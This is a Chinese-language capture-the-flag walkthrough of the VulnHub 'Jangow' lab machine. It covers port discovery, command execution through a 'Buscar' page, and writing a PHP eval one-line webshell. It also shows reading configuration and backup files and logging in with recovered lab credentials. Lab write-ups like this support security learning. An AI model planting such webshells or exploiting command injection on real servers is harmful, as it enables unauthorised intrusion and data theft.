VulnHub JANGOW

提示（主机ip分配问题）

因为直接在VulnHub上下载的盒子，在VMware上打开，默认是不分配主机的

所以我们可以在VirtualBox上打开

一、信息收集

发现开放了21和80端口，查看一下80端口

80端口：

检查页面后发现Buscar页面有个可疑的地方：

试下，有命令执行

直接写入一句话木马试一下：

echo '<?php eval($_POST["sain"]);' > shell.php

利用命令执行，看到有shell.php，说明上传成功

连接成功。简单查看一下文件，在/var/www/html/site/wordpress下也发现了配置文件：

除此之外发现在/var/www/html下有一个./backup文件：

发现都是数据库的用户名和密码，但是jangow01和系统名字一样，所以我就尝试下直接登录系统，发现可以直接登陆进去：

username = "jangow01"password = "abygurl69"

拿到了user_flag